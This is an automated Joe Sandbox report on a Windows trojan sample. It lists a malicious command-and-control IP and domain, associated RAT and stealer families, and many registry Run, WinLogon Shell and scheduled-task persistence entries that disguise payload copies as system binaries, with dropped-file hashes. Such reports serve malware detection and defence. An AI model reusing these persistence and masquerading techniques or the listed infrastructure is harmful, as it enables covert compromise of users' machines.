IP	Domain	Country	Flag	ASN	ASN Name	Malicious
147.185.221.19	letter-takes.gl.at.ply.gg	United States		12087	SALSGIVERUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1455415
Start date and time:	2024-06-11 20:06:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	52
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ywXeiXEvP2.exe renamed because original name is a hash value
Original Sample Name:	a8a4603bc85e306e0fdd17655e4820e4.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@48/39@1/2
EGA Information:	Successful, ratio: 28.6%
HCA Information:	Successful, ratio: 63% Number of executed functions: 287 Number of non-executed functions: 123
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, RuntimeBroker.exe, ShellExperienceHost.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, a0991799.xsph.ru
Execution Graph export aborted for target FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe, PID 7368 because it is empty
Execution Graph export aborted for target ServerWeb.exe, PID 7488 because it is empty
Execution Graph export aborted for target XClient.exe, PID 7204 because it is empty
Execution Graph export aborted for target conhost.exe, PID 2008 because it is empty
Execution Graph export aborted for target conhost.exe, PID 7280 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: ywXeiXEvP2.exe

Simulations

Behavior and APIs

Time	Type	Description
14:07:09	API Interceptor	14036822x Sleep call for process: XClient.exe modified
19:07:11	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
19:07:18	Task Scheduler	Run new task: conhost path: "C:\Program Files (x86)\jdownloader\config\conhost.exe"
19:07:18	Task Scheduler	Run new task: conhostc path: "C:\Program Files (x86)\jdownloader\config\conhost.exe"
19:07:18	Task Scheduler	Run new task: FMxFFfLOKpqCLtTFEmbkPKJrDwH path: "C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe"
19:07:19	Task Scheduler	Run new task: FMxFFfLOKpqCLtTFEmbkPKJrDwHF path: "C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe"
19:07:19	Task Scheduler	Run new task: RuntimeBroker path: "C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe"
19:07:19	Task Scheduler	Run new task: RuntimeBrokerR path: "C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe"
19:07:19	Task Scheduler	Run new task: sihost path: "C:\Users\user\SendTo\sihost.exe"
19:07:19	Task Scheduler	Run new task: sihosts path: "C:\Users\user\SendTo\sihost.exe"
19:07:22	Task Scheduler	Run new task: OfficeClickToRun path: "C:\Program Files\Uninstall Information\OfficeClickToRun.exe"
19:07:22	Task Scheduler	Run new task: OfficeClickToRunO path: "C:\Program Files\Uninstall Information\OfficeClickToRun.exe"
19:07:22	Task Scheduler	Run new task: UserOOBEBroker path: "C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe"
19:07:22	Task Scheduler	Run new task: UserOOBEBrokerU path: "C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe"
19:07:22	Task Scheduler	Run new task: XClient path: "C:\Recovery\XClient.exe"
19:07:22	Task Scheduler	Run new task: XClientX path: "C:\Recovery\XClient.exe"
19:07:28	Autostart	Run: WinLogon Shell "C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe"
19:07:36	Autostart	Run: WinLogon Shell "C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe"
19:07:45	Autostart	Run: WinLogon Shell "C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe"
19:07:53	Autostart	Run: WinLogon Shell "C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe"
19:08:02	Autostart	Run: WinLogon Shell "C:\Users\user\SendTo\sihost.exe"
19:08:10	Autostart	Run: WinLogon Shell "C:\Program Files (x86)\jdownloader\config\conhost.exe"
19:08:18	Autostart	Run: WinLogon Shell "C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe"
19:08:26	Autostart	Run: WinLogon Shell "C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe"
19:08:34	Autostart	Run: WinLogon Shell "C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe"
19:08:39	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH "C:\Windows\ELAMBKUP\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe"
19:08:47	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files\Windows Photo Viewer\en-GB\RuntimeBroker.exe"
19:08:56	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Users\user\SendTo\sihost.exe"
19:09:04	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Program Files (x86)\jdownloader\config\conhost.exe"
19:09:12	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run UserOOBEBroker "C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe"
19:09:20	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun "C:\Program Files\Uninstall Information\OfficeClickToRun.exe"
19:09:28	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XClient "C:\Recovery\XClient.exe"
19:09:37	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH "C:\Windows\ELAMBKUP\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe"
19:09:45	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files\Windows Photo Viewer\en-GB\RuntimeBroker.exe"
19:09:53	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Users\user\SendTo\sihost.exe"
19:10:01	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Program Files (x86)\jdownloader\config\conhost.exe"
19:10:09	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run UserOOBEBroker "C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe"
19:10:18	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun "C:\Program Files\Uninstall Information\OfficeClickToRun.exe"
19:10:26	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XClient "C:\Recovery\XClient.exe"
19:10:34	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH "C:\Windows\ELAMBKUP\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe"
19:10:42	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files\Windows Photo Viewer\en-GB\RuntimeBroker.exe"
19:10:50	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Users\user\SendTo\sihost.exe"
19:10:58	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Program Files (x86)\jdownloader\config\conhost.exe"
19:11:07	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run UserOOBEBroker "C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe"
19:11:15	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun "C:\Program Files\Uninstall Information\OfficeClickToRun.exe"
19:11:23	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run XClient "C:\Recovery\XClient.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
147.185.221.19	SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe	Get hash	malicious	Amadey, RedLine, RisePro Stealer	Browse	b-stamps.gl.at.ply.gg:30946/
147.185.221.19	X82dKIfzi3.exe	Get hash	malicious	RedLine	Browse	rights-mountains.gl.at.ply.gg:23403/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
letter-takes.gl.at.ply.gg	2RfhxxWcuH.exe	Get hash	malicious	DCRat, XWorm	Browse	147.185.221.19

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SALSGIVERUS	2RfhxxWcuH.exe	Get hash	malicious	DCRat, XWorm	Browse	147.185.221.19
	6m45X1uPnb.exe	Get hash	malicious	Njrat	Browse	147.185.221.20
	kzERQcdqmc.elf	Get hash	malicious	Mirai, Moobot, Okiru	Browse	147.170.50.220
	cNjgs425Sf.exe	Get hash	malicious	Quasar	Browse	147.185.221.19
	GIWRAEiTj1.exe	Get hash	malicious	Njrat	Browse	147.185.221.19
	bMAplZixhH.exe	Get hash	malicious	Njrat	Browse	147.185.221.19
	Dang_Tap v3.2.exe	Get hash	malicious	XWorm	Browse	147.185.221.19
	LzMokk1scI.exe	Get hash	malicious	Njrat, PureLog Stealer, zgRAT	Browse	147.185.221.19
	fkuWWu4wjg.elf	Get hash	malicious	Mirai	Browse	147.184.134.137
	Rf.bat	Get hash	malicious	XWorm	Browse	147.185.221.19

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe	2RfhxxWcuH.exe	Get hash	malicious	DCRat, XWorm	Browse
C:\Program Files\Uninstall Information\OfficeClickToRun.exe	2RfhxxWcuH.exe	Get hash	malicious	DCRat, XWorm	Browse
C:\Program Files (x86)\jDownloader\config\conhost.exe	2RfhxxWcuH.exe	Get hash	malicious	DCRat, XWorm	Browse
C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	2RfhxxWcuH.exe	Get hash	malicious	DCRat, XWorm	Browse

Created / dropped Files

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\9e8d7a4ca61bd9

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	ASCII text, with very long lines (609), with no line terminators
Category:	dropped
Size (bytes):	609
Entropy (8bit):	5.887540865257822
Encrypted:	false
SSDEEP:	12:jDRlQyyqk2HyrQec0YwU98gde9ozm99IpLrlvVqe9+dKTRFyFfz6:jjyZ2SLcbw3gC99IL0CPRYFb6
MD5:	48FC6CE5C86A14437F0AF388B1EA9987
SHA1:	FD4DD0B5249EB290BC78BC07F3F1D0AC75171F27
SHA-256:	ECE301B1C38CA08A2E0B73D21B019DA019084E4848524CA562F137B96901D80A
SHA-512:	E76F02EC356D6367DBF9E26D53EDBEE5201948B3FDA5E35DCC1806E18F4FC5333F66B13D1FB4D21A1E03B6C1E7A171B47C21E4AF0AE23C2F25D8B0BEFF1545D5
Malicious:	false
Preview:	VRgYtMFxNcFai2NQOJWW6YVRaTEF5d1wEgQlvpdtnI7KNEjZEiFmBip66O8ZH92tkTWCmmeipmtyaKEWupBWYPuf1TogrDmnPOj4shxbDg6Zz1gvKlpb8fVVi0LS781mAFiMlJnM2jT1SVq9x3VFXKot2NW1WedEoUZtSTJB8djYMdDNKLfEnwOzayTYxv0YFPM756rdtUH4lQhZKIrL9Zb2GjSeAvOMnLS7QFROeBVTpUOKR4OoEoYqxU1WnNc8F4Qa7kIE1dr7EINvVINGhjH8wlJ6N5kQiWNuDyMqvJxl7bmpHGBfAWafwSnWbM052aYr4crg5gVXwgBU8eyH4FQM5r7vK0PjT1shC5uoYejdBDtQRTX6XsBxJMvNe5WFRwD4ydRDtKtZfxL28re1dSLk05Y0KhJcIeMP9ycxBTNM9mRVB2Pxbfl8kcE2Fa3MAQQBk52JPrzJF8lNnCzRSWBn2NogujrlaAMsVPvFAFhtpb3l10ODll4oOnIWQVZp9OsFw21YRuQMyR7aUDp3UoAzFidsHYyoq1ubsyz890w0Usz7psCNqgVVO39OYIQ26lg6hfrgNq3d2JeXsgDYVk8JgZNzylk0j

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3549696
Entropy (8bit):	7.781810498852624
Encrypted:	false
SSDEEP:	49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
MD5:	7EC6BC11E4B2E409845E3160EC47F5D7
SHA1:	C1A1A62F844556FD150C7515E124E98BF6D79A02
SHA-256:	B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
SHA-512:	6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Joe Sandbox View:	Filename: 2RfhxxWcuH.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\jDownloader\config\088424020bedd6

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	ASCII text, with very long lines (432), with no line terminators
Category:	dropped
Size (bytes):	432
Entropy (8bit):	5.8750345879664
Encrypted:	false
SSDEEP:	12:P1LfkhMOMhXXXHiJCNjiPnnkEiMS9108q:PpLHiJCNEnZRC08q
MD5:	EEE8F7CFAC83668ECFEB1D5D7C012A11
SHA1:	FB2AD686F892B62A122CFD11F4F46497E371FB5C
SHA-256:	8E8C371F77064753FC7ABEAE789F177FA57E86DBF2A828649E3035323005400C
SHA-512:	44856F911801815A8BCD335022317346B6E3BE4BF8559D3BF2E4BCB55F41DDF4C0C98D24A6CAA67AADED076206C63020B0004A5BA32DD2E3D74B5B7D240670BD
Malicious:	false
Preview:	hiCtPj2vT1VpgwzuABTtl7b2lsa0exgxHRStHeoZ0JUZPkzV7feLsizjHKHgICRgViiOeFmgX32bnBmB3F38TUEicsm7WHRy2yDrBk1127yypX6FhGnDISMBdAwvcpKQmDiy75ASOCGWfP3EvhaQdOqklCNByFYNwhMlzHHlGVyGM0fNGr95O4xYX8M5s8eIn3j8DRPnayKHZkXvg94GFd82uyO05L3H1qcSRhKzcVfZup8xkbZsEXCK4qOOCZsO5CQtHEe8yEot7iIEzaPdwKCdnRYkT6wCnRerYPpf6b49sTNWiJZlJOcvAwF0q3p2RlGqEbpjvthUQCvUEBCKhL3YysqmKzyCwBrGMgSHdz0ZrHf7Bvvp1fVGss1VuDZ54eiOUoHht5qrUdqrNtkYDJLRqlYdo6WZa5eNiRmWnO56ynwO

C:\Program Files (x86)\jDownloader\config\conhost.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3549696
Entropy (8bit):	7.781810498852624
Encrypted:	false
SSDEEP:	49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
MD5:	7EC6BC11E4B2E409845E3160EC47F5D7
SHA1:	C1A1A62F844556FD150C7515E124E98BF6D79A02
SHA-256:	B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
SHA-512:	6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Joe Sandbox View:	Filename: 2RfhxxWcuH.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Uninstall Information\OfficeClickToRun.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3549696
Entropy (8bit):	7.781810498852624
Encrypted:	false
SSDEEP:	49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
MD5:	7EC6BC11E4B2E409845E3160EC47F5D7
SHA1:	C1A1A62F844556FD150C7515E124E98BF6D79A02
SHA-256:	B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
SHA-512:	6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Joe Sandbox View:	Filename: 2RfhxxWcuH.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Uninstall Information\e6c9b481da804f

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	116
Entropy (8bit):	5.554890344299369
Encrypted:	false
SSDEEP:	3:jqkuXUcD/Xa2RO/WiAlEQlYnulnJvJJImPiBfR:WkqFD/Xa2ROPjQlYuJJvPipR
MD5:	4539DFE43C214F120D6B7960FA6AF11E
SHA1:	CFD91E76D776E8D185731887C775534F2A108179
SHA-256:	DE46EFE21B80750E02D9997E4789C789B38E141EA6FCA449F1DFB7D6CEC45C28
SHA-512:	EF620666B9BEA2C75D54A6FCF52857FDCDE7D1CC13F79F821736795276712EB02217AF985CB94DA796EB32BAB6752ED6E1E475B28669B970641ED4789D10FC70
Malicious:	false
Preview:	jfrJOds2AcFQx2TUG191zqZ2PurlLCDcshYhZNi2v1WZhKxsyv6neFR3Gy4dwGq7YnhPdv42SHF8T9VE79xaGa8nQfalSEGoLZB4miOC1DUW9TjGdzgw

C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3549696
Entropy (8bit):	7.781810498852624
Encrypted:	false
SSDEEP:	49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
MD5:	7EC6BC11E4B2E409845E3160EC47F5D7
SHA1:	C1A1A62F844556FD150C7515E124E98BF6D79A02
SHA-256:	B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
SHA-512:	6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Joe Sandbox View:	Filename: 2RfhxxWcuH.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\d908c538d2e8d0

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	104
Entropy (8bit):	5.560983050217844
Encrypted:	false
SSDEEP:	3:dWCV0m6SCS7PiOJ5bh8icAhhJ7V2STRdbRX33:0mcSPhh/7cST7b5
MD5:	4B54EED7A1C461983C35F481011AF74D
SHA1:	9DDBDA570F979F37688DE544E00D4F7412A28915
SHA-256:	AE38AD37EB2FC1676B6DBCD7910EA54651C413966C8600B7E9083F6BB1C925C6
SHA-512:	E9AB83E77BE636808E76CF3452085F522126554C45B69A7F2AF47F688776C5D952517DC93CE96BF5FA94D7BCEA40D3E8C72D59FCDD0994AB1447379BD8ABE405
Malicious:	false
Preview:	umUR1cR0r5QHboQna0EXR9O7puwRWwqJyPGwGZuz8lgHZXYeMdMsi3yuYWlHp9e4PHTLidhAFPYqdGiSWSE2j7k4bWYtxnJ8Hl2RDM6s

C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3549696
Entropy (8bit):	7.781810498852624
Encrypted:	false
SSDEEP:	49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
MD5:	7EC6BC11E4B2E409845E3160EC47F5D7
SHA1:	C1A1A62F844556FD150C7515E124E98BF6D79A02
SHA-256:	B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
SHA-512:	6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Windows Multimedia Platform\d908c538d2e8d0

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	ASCII text, with very long lines (820), with no line terminators
Category:	dropped
Size (bytes):	820
Entropy (8bit):	5.905800036154983
Encrypted:	false
SSDEEP:	24:IudYd3Kge+6gpyoUe/8LHKvyC91BgnbalbuRcFuY6:Itd3Kgppp/ESG/qw
MD5:	A8E3D31D7F1DB9EFDE38E414E862F9C7
SHA1:	97437C74B4D98EB6F9EED27537D604BCE9B76AE6
SHA-256:	0AD5A19B7D932752BC918D9BCA02B4C3B3793B5106BB90BF57461FD1B3C7D8C2
SHA-512:	76BC19BB83661082233FA86F292E76DB32488482749775084809D38E0B0258412F4161DB49F3D671C5AD720C852133C85465CF00A12612841FBB78C905AA4307
Malicious:	false
Preview:	dIbA784Pe57rjYti1D6zP8jbIw89q4hYP4f6oEdHPGEEOKkHsWNxu0ieiA1L95jkYico2x3xkzkJ3fM8L0QTqtoYVAXoMSHUgdqps6P5daN4QZlDy39JoQ4o3ES2aPkRsQmazgPOlV0PftH6ZTzSS7pQjBvooXeN05MAxLORouiTapIK6VcHZR9ulV0xulkN0mZkgHJOFiohZV042lrS4Xyi6cYbUagCKUcxPinyMOC1nbUPf64J3STdy1nEss3oBlXF3CoU83FpV74eIJ5XgXJ1A89Y4iFeUXzBEPWcRkK9MnI16J6jwgIocfE4CQZZxlV7H3a2wcF5NJoW0IbvmgryPKiiLcZBLvMlSLtCtDwTaMbT1rE4ynwR3gr7U1rUCEub7CEpZZCjtYXDtPrdYfMh84swdwr1VcQWc9VynYfZlNifJoNFKO6h1NdCURLnrKNRHBku4209Ax5uWNnyimrHftfOfTdVN1sbARXHDcKRX7gDRsqHoWEEdFvYfWOkZevIFeuFzfvFbZtiMb7xmWq0xn75f8mrOk23LY7x8lRJl8mDVNMEZa7Cy5Vbgzj03D11h0WydJzBEgOyB4jSwiSxmzEQCgQJBaQiHuge0XkPl68RqgamPREVuDPrwGv73q9oQqrQYFbZ7DLp1xjfFo4uW5xDfysulmW56UBAzKNJzoXr2j08gQ2OvPRU2oukXrxVrQthviq4au5riGL57tNVtHJrCrILZnwI1BAm0TN8k8yBTjvwdzmnebljGBeEaeew8x0gFiFogPvvTIXc5VskBIoZabfyyIhFdBCgtPq4t7HPqzP7

C:\Program Files\Windows Photo Viewer\en-GB\7ccfebd9e92364

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	ASCII text, with very long lines (609), with no line terminators
Category:	dropped
Size (bytes):	609
Entropy (8bit):	5.875432697415312
Encrypted:	false
SSDEEP:	12:TFhjX70Xt56Lr404uxFAP/CJ5GlXMFox4RKyZCVQZu+Tjj:TFhO76o04YP5Gxre4yQQZu+nj
MD5:	8BB4990BB7711568F5D781F9F7E160F9
SHA1:	6FE9137A70D9A8D676E53032600990B9ED51A310
SHA-256:	548069FC2508B3DA8A1CFDCC50B7647F279C0B584144D4C7F380BDE08B3CF4E8
SHA-512:	3C91D7E3466B1C4DFAF812E07380B62D2E59EBE83BE76359012A8F4987CC92027B72345E845D5E25C2E51A5B5E97E9A1C53999E54B2E16C7E0ADCE4483B498A3
Malicious:	false
